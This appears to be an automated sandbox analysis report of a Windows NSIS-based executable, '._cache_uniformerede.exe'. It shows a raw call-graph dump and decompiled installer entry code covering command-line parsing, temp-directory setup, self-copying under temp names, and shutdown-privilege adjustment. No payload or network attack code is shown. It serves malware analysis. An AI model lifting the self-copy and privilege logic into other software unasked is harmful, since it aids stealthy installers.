4052a8 5911->5918 5913 40512a DeleteObject 5912->5913 5914 40511d SendMessageW 5912->5914 5915 405133 5913->5915 5914->5913 5916 40516a 5915->5916 5919 4066a5 17 API calls 5915->5919 5920 4045c4 18 API calls 5916->5920 5917 40538a 5921 405436 5917->5921 5931 4053e3 SendMessageW 5917->5931 5951 40529b 5917->5951 5918->5917 5926 405317 5918->5926 5965 404f7f SendMessageW 5918->5965 5924 40514c SendMessageW SendMessageW 5919->5924 5925 40517e 5920->5925 5922 405440 SendMessageW 5921->5922 5923 405448 5921->5923 5922->5923 5933 405461 5923->5933 5934 40545a ImageList_Destroy 5923->5934 5941 405471 5923->5941 5924->5915 5930 4045c4 18 API calls 5925->5930 5926->5917 5927 40537c SendMessageW 5926->5927 5927->5917 5928 40462b 8 API calls 5932 405637 5928->5932 5945 40518f 5930->5945 5936 4053f8 SendMessageW 5931->5936 5931->5951 5937 40546a GlobalFree 5933->5937 5933->5941 5934->5933 5935 4055eb 5942 4055fd ShowWindow GetDlgItem ShowWindow 5935->5942 5935->5951 5939 40540b 5936->5939 5937->5941 5938 40526a GetWindowLongW SetWindowLongW 5940 405283 5938->5940 5950 40541c SendMessageW 5939->5950 5943 4052a0 5940->5943 5944 405288 ShowWindow 5940->5944 5941->5935 5956 4054ac 5941->5956 5970 404fff 5941->5970 5942->5951 5964 4045f9 SendMessageW 5943->5964 5963 4045f9 SendMessageW 5944->5963 5945->5938 5946 405265 5945->5946 5949 4051e2 SendMessageW 5945->5949 5952 405220 SendMessageW 5945->5952 5953 405234 SendMessageW 5945->5953 5946->5938 5946->5940 5949->5945 5950->5921 5951->5928 5952->5945 5953->5945 5955 4055b6 5957 4055c1 InvalidateRect 5955->5957 5960 4055cd 5955->5960 5958 4054da SendMessageW 5956->5958 5959 4054f0 5956->5959 5957->5960 5958->5959 5959->5955 5961 405564 SendMessageW SendMessageW 5959->5961 5960->5935 5979 404f3a 5960->5979 5961->5959 5963->5951 5964->5918 5966 404fa2 GetMessagePos ScreenToClient SendMessageW 5965->5966 5967 404fde SendMessageW 5965->5967 5968 404fd6 5966->5968 5969 404fdb 5966->5969 5967->5968 5968->5926 5969->5967 5982 406668 lstrcpynW 5970->5982 5972 405012 5983 4065af wsprintfW 5972->5983 5974 40501c 5975 40140b 2 API calls 5974->5975 5976 405025 5975->5976 5984 406668 lstrcpynW 5976->5984 5978 40502c 5978->5956 5985 404e71 5979->5985 5981 404f4f 5981->5935 5982->5972 5983->5974 5984->5978 5986 404e8a 5985->5986 5987 4066a5 17 API calls 5986->5987 5988 404eee 5987->5988 5989 4066a5 17 API calls 5988->5989 5990 404ef9 5989->5990 5991 4066a5 17 API calls 5990->5991 5992 404f0f lstrlenW wsprintfW SetDlgItemTextW 5991->5992 5992->5981 5077 4023b2 5078 4023c0 5077->5078 5079 4023ba 5077->5079 5081 402da6 17 API calls 5078->5081 5083 4023ce 5078->5083 5080 402da6 17 API calls 5079->5080 5080->5078 5081->5083 5082 4023dc 5085 402da6 17 API calls 5082->5085 5083->5082 5084 402da6 17 API calls 5083->5084 5084->5082 5086 4023e5 WritePrivateProfileStringW 5085->5086 5998 687e170d 5999 687e15b6 GlobalFree 5998->5999 6002 687e1725 5999->6002 6000 687e176b GlobalFree 6001 687e1740 6001->6000 6002->6000 6002->6001 6003 687e1757 VirtualFree 6002->6003 6003->6000 5087 402434 5088 402467 5087->5088 5089 40243c 5087->5089 5091 402da6 17 API calls 5088->5091 5090 402de6 17 API calls 5089->5090 5092 402443 5090->5092 5093 40246e 5091->5093 5094 40244d 5092->5094 5097 40247b 5092->5097 5099 402e64 5093->5099 5096 402da6 17 API calls 5094->5096 5098 402454 RegDeleteValueW RegCloseKey 5096->5098 5098->5097 5100 402e71 5099->5100 5101 402e78 5099->5101 5100->5097 5101->5100 5103 402ea9 5101->5103 5104 4064d5 RegOpenKeyExW 5103->5104 5105 402ed7 5104->5105 5106 402ee1 5105->5106 5107 402f8c 5105->5107 5108 402ee7 RegEnumValueW 5106->5108 5113 402f0a 5106->5113 5107->5100 5109 402f71 RegCloseKey 5108->5109 5108->5113 5109->5107 5110 402f46 RegEnumKeyW 5111 402f4f RegCloseKey 5110->5111 5110->5113 5112 406a35 5 API calls 5111->5112 5114 402f5f 5112->5114 5113->5109 5113->5110 5113->5111 5115 402ea9 6 API calls 5113->5115 5116 402f81 5114->5116 5117 402f63 RegDeleteKeyW 5114->5117 5115->5113 5116->5107 5117->5107 6004 404734 lstrlenW 6005 404753 6004->6005 6006 404755 WideCharToMultiByte 6004->6006 6005->6006 5118 401735 5119 402da6 17 API calls 5118->5119 5120 40173c SearchPathW 5119->5120 5121 401757 5120->5121 6007 404ab5 6008 404ae1 6007->6008 6009 404af2 6007->6009 6068 405cac GetDlgItemTextW 6008->6068 6011 404afe GetDlgItem 6009->6011 6013 404b5d 6009->6013 6012 404b12 6011->6012 6017 404b26 SetWindowTextW 6012->6017 6020 405fe2 4 API calls 6012->6020 6014 404c41 6013->6014 6022 4066a5 17 API calls 6013->6022 6066 404df0 6013->6066 6014->6066 6070 405cac GetDlgItemTextW 6014->6070 6015 404aec 6016 4068ef 5 API calls 6015->6016 6016->6009 6021 4045c4 18 API calls 6017->6021 6019 40462b 8 API calls 6024 404e04 6019->6024 6025 404b1c 6020->6025 6026 404b42 6021->6026 6027 404bd1 SHBrowseForFolderW 6022->6027 6023 404c71 6028 40603f 18 API calls 6023->6028 6025->6017 6031 405f37 3 API calls 6025->6031 6029 4045c4 18 API calls 6026->6029 6027->6014 6030 404be9 CoTaskMemFree 6027->6030 6034 404c77 6028->6034 6032 404b50 6029->6032 6033 405f37 3 API calls 6030->6033 6031->6017 6069 4045f9 SendMessageW 6032->6069 6036 404bf6 6033->6036 6071 406668 lstrcpynW 6034->6071 6039 404c2d SetDlgItemTextW 6036->6039 6043 4066a5 17 API calls 6036->6043 6038 404b56 6041 406a35 5 API calls 6038->6041 6039->6014 6040 404c8e 6042 406a35 5 API calls 6040->6042 6041->6013 6049 404c95 6042->6049 6044 404c15 lstrcmpiW 6043->6044 6044->6039 6046 404c26 lstrcatW 6044->6046 6045 404cd6 6072 406668 lstrcpynW 6045->6072 6046->6039 6048 404cdd 6050 405fe2 4 API calls 6048->6050 6049->6045 6054 405f83 2 API calls 6049->6054 6055 404d2e 6049->6055 6051 404ce3 GetDiskFreeSpaceW 6050->6051 6053 404d07 MulDiv 6051->6053 6051->6055 6053->6055 6054->6049 6056 404d9f 6055->6056 6058 404f3a 20 API calls 6055->6058 6057 404dc2 6056->6057 6059 40140b 2 API calls 6056->6059 6073 4045e6 KiUserCallbackDispatcher 6057->6073 6060 404d8c 6058->6060 6059->6057 6062 404da1 SetDlgItemTextW 6060->6062 6063 404d91 6060->6063 6062->6056 6064 404e71 20 API calls 6063->6064 6064->6056 6065 404dde 6065->6066 6067 404a0e SendMessageW 6065->6067 6066->6019 6067->6066 6068->6015 6069->6038 6070->6023 6071->6040 6072->6048 6073->6065 6074 401d38 6075 402d84 17 API calls 6074->6075 6076 401d3f 6075->6076 6077 402d84 17 API calls 6076->6077 6078 401d4b GetDlgItem 6077->6078 6079 402638 6078->6079 6080 4014b8 6081 4014be 6080->6081 6082 401389 2 API calls 6081->6082 6083 4014c6 6082->6083 6084 687e1000 6085 687e101b 5 API calls 6084->6085 6086 687e1019 6085->6086 6087 40563e 6088 405662 6087->6088 6089 40564e 6087->6089 6092 40566a IsWindowVisible 6088->6092 6098 405681 6088->6098 6090 405654 6089->6090 6091 4056ab 6089->6091 6094 404610 SendMessageW 6090->6094 6093 4056b0 CallWindowProcW 6091->6093 6092->6091 6095 405677 6092->6095 6096 40565e 6093->6096 6094->6096 6097 404f7f 5 API calls 6095->6097 6097->6098 6098->6093 6099 404fff 4 API calls 6098->6099 6099->6091 6100 40263e 6101 402652 6100->6101 6102 40266d 6100->6102 6103 402d84 17 API calls 6101->6103 6104 402672 6102->6104 6105 40269d 6102->6105 6114 402659 6103->6114 6107 402da6 17 API calls 6104->6107 6106 402da6 17 API calls 6105->6106 6108 4026a4 lstrlenW 6106->6108 6109 402679 6107->6109 6108->6114 6117 40668a WideCharToMultiByte 6109->6117 6111 40268d lstrlenA 6111->6114 6112 4026e7 6113 4026d1 6113->6112 6115 40620a WriteFile 6113->6115 6114->6112 6114->6113 6116 406239 5 API calls 6114->6116 6115->6112 6116->6113 6117->6111

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a call 403c25 OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 79 403b91-403b97 65->79 80 403b7c-403b8b call 405cc8 ExitProcess 65->80 66->53 67->53 67->66 84 403a0c-403a19 69->84 85 4039bc-4039f1 69->85 78 403a54-403a57 70->78 78->65 82 403b99-403bae GetCurrentProcess OpenProcessToken 79->82 83 403c0f-403c17 79->83 89 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->89 90 403bdf-403bed call 406a35 82->90 92 403c19 83->92 93 403c1c-403c1f ExitProcess 83->93 86 403a1b-403a29 call 40603f 84->86 87 403a5c-403a70 call 405c33 lstrcatW 84->87 91 4039f3-4039f7 85->91 86->65 103 403a2f-403a45 call 406668 * 2 86->103 106 403a72-403a78 lstrcatW 87->106 107 403a7d-403a97 lstrcatW lstrcmpiW 87->107 89->90 104 403bfb-403c06 ExitWindowsEx 90->104 105 403bef-403bf9 90->105 97 403a00-403a08 91->97 98 4039f9-4039fe 91->98 92->93 97->91 102 403a0a 97->102 98->97 98->102 102->84 103->70 104->83 111 403c08-403c0a call 40140b 104->111 105->104 105->111 106->107 108 403b6a 107->108 109 403a9d-403aa0 107->109 108->65 112 403aa2-403aa7 call 405b99 109->112 113 403aa9 call 405c16 109->113 111->83 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ";
				E00406668(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a260 = 0x400000;
				_t251 = L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405F64(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2f4 == _t189) {
														L77:
														_t120 =  *0x42a30c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t189) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ") {
													_t190 = E00405C33(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\hardz\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t220);
														}
														E00406668(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe", 0x420f08, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t153 = E00405C4B(0x420f08);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t222);
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                                                                                                                                                            0x0040364e
                                                                                                                                                                                                                            0x0040364f
                                                                                                                                                                                                                            0x00403656
                                                                                                                                                                                                                            0x00403659
                                                                                                                                                                                                                            0x00403660
                                                                                                                                                                                                                            0x00403663
                                                                                                                                                                                                                            0x00403676
                                                                                                                                                                                                                            0x0040367c
                                                                                                                                                                                                                            0x0040367f
                                                                                                                                                                                                                            0x00403682
                                                                                                                                                                                                                            0x00403690
                                                                                                                                                                                                                            0x00403698
                                                                                                                                                                                                                            0x004036a3
                                                                                                                                                                                                                            0x004036bc
                                                                                                                                                                                                                            0x004036be
                                                                                                                                                                                                                            0x004036c6
                                                                                                                                                                                                                            0x004036c6
                                                                                                                                                                                                                            0x004036d1
                                                                                                                                                                                                                            0x004036d3
                                                                                                                                                                                                                            0x004036d3
                                                                                                                                                                                                                            0x004036e8
                                                                                                                                                                                                                            0x0040370d
                                                                                                                                                                                                                            0x0040371b
                                                                                                                                                                                                                            0x0040371e
                                                                                                                                                                                                                            0x00403725
                                                                                                                                                                                                                            0x0040372c
                                                                                                                                                                                                                            0x0040372c
                                                                                                                                                                                                                            0x00403725
                                                                                                                                                                                                                            0x0040372e
                                                                                                                                                                                                                            0x00403733
                                                                                                                                                                                                                            0x00403734
                                                                                                                                                                                                                            0x00403740
                                                                                                                                                                                                                            0x00403744
                                                                                                                                                                                                                            0x0040374b
                                                                                                                                                                                                                            0x00403759
                                                                                                                                                                                                                            0x0040375e
                                                                                                                                                                                                                            0x00403765
                                                                                                                                                                                                                            0x00403769
                                                                                                                                                                                                                            0x0040376d
                                                                                                                                                                                                                            0x0040376f
                                                                                                                                                                                                                            0x0040376f
                                                                                                                                                                                                                            0x0040376d
                                                                                                                                                                                                                            0x00403776
                                                                                                                                                                                                                            0x0040377d
                                                                                                                                                                                                                            0x00403783
                                                                                                                                                                                                                            0x0040379b
                                                                                                                                                                                                                            0x004037ab
                                                                                                                                                                                                                            0x004037b0
                                                                                                                                                                                                                            0x004037b6
                                                                                                                                                                                                                            0x004037bd
                                                                                                                                                                                                                            0x004037c4
                                                                                                                                                                                                                            0x004037c6
                                                                                                                                                                                                                            0x004037c7
                                                                                                                                                                                                                            0x004037d1
                                                                                                                                                                                                                            0x004037d8
                                                                                                                                                                                                                            0x004037da
                                                                                                                                                                                                                            0x004037dc
                                                                                                                                                                                                                            0x004037dc
                                                                                                                                                                                                                            0x004037ef
                                                                                                                                                                                                                            0x004037f1
                                                                                                                                                                                                                            0x004038eb
                                                                                                                                                                                                                            0x004038eb
                                                                                                                                                                                                                            0x004038ee
                                                                                                                                                                                                                            0x004038f1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004037fb
                                                                                                                                                                                                                            0x004037fc
                                                                                                                                                                                                                            0x004037ff
                                                                                                                                                                                                                            0x00403808
                                                                                                                                                                                                                            0x00403808
                                                                                                                                                                                                                            0x0040380b
                                                                                                                                                                                                                            0x0040380e
                                                                                                                                                                                                                            0x00403811
                                                                                                                                                                                                                            0x00403814
                                                                                                                                                                                                                            0x00403814
                                                                                                                                                                                                                            0x00403814
                                                                                                                                                                                                                            0x00403815
                                                                                                                                                                                                                            0x00403819
                                                                                                                                                                                                                            0x004038d9
                                                                                                                                                                                                                            0x004038e2
                                                                                                                                                                                                                            0x004038e4
                                                                                                                                                                                                                            0x004038e7
                                                                                                                                                                                                                            0x004038ea
                                                                                                                                                                                                                            0x004038ea
                                                                                                                                                                                                                            0x004038ea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040381f
                                                                                                                                                                                                                            0x00403820
                                                                                                                                                                                                                            0x00403821
                                                                                                                                                                                                                            0x00403825
                                                                                                                                                                                                                            0x0040383f
                                                                                                                                                                                                                            0x00403846
                                                                                                                                                                                                                            0x00403859
                                                                                                                                                                                                                            0x0040385a
                                                                                                                                                                                                                            0x0040386f
                                                                                                                                                                                                                            0x00403874
                                                                                                                                                                                                                            0x00403876
                                                                                                                                                                                                                            0x00403878
                                                                                                                                                                                                                            0x00403894
                                                                                                                                                                                                                            0x0040389b
                                                                                                                                                                                                                            0x004038ae
                                                                                                                                                                                                                            0x004038af
                                                                                                                                                                                                                            0x004038c4
                                                                                                                                                                                                                            0x004038ca
                                                                                                                                                                                                                            0x004038cc
                                                                                                                                                                                                                            0x004038ce
                                                                                                                                                                                                                            0x004038d6
                                                                                                                                                                                                                            0x004038d8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004038d8
                                                                                                                                                                                                                            0x004038d2
                                                                                                                                                                                                                            0x004038d4
                                                                                                                                                                                                                            0x004038f9
                                                                                                                                                                                                                            0x004038fd
                                                                                                                                                                                                                            0x00403906
                                                                                                                                                                                                                            0x0040390b
                                                                                                                                                                                                                            0x00403911
                                                                                                                                                                                                                            0x0040391c
                                                                                                                                                                                                                            0x0040391e
                                                                                                                                                                                                                            0x00403923
                                                                                                                                                                                                                            0x00403925
                                                                                                                                                                                                                            0x0040397d
                                                                                                                                                                                                                            0x00403982
                                                                                                                                                                                                                            0x0040398b
                                                                                                                                                                                                                            0x00403992
                                                                                                                                                                                                                            0x00403995
                                                                                                                                                                                                                            0x00403b6c
                                                                                                                                                                                                                            0x00403b6c
                                                                                                                                                                                                                            0x00403b71
                                                                                                                                                                                                                            0x00403b7a
                                                                                                                                                                                                                            0x00403b97
                                                                                                                                                                                                                            0x00403c0f
                                                                                                                                                                                                                            0x00403c0f
                                                                                                                                                                                                                            0x00403c17
                                                                                                                                                                                                                            0x00403c19
                                                                                                                                                                                                                            0x00403c19
                                                                                                                                                                                                                            0x00403c1f
                                                                                                                                                                                                                            0x00403c1f
                                                                                                                                                                                                                            0x00403bae
                                                                                                                                                                                                                            0x00403bba
                                                                                                                                                                                                                            0x00403bcb
                                                                                                                                                                                                                            0x00403bd2
                                                                                                                                                                                                                            0x00403bd9
                                                                                                                                                                                                                            0x00403bd9
                                                                                                                                                                                                                            0x00403be1
                                                                                                                                                                                                                            0x00403bed
                                                                                                                                                                                                                            0x00403bfb
                                                                                                                                                                                                                            0x00403c06
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
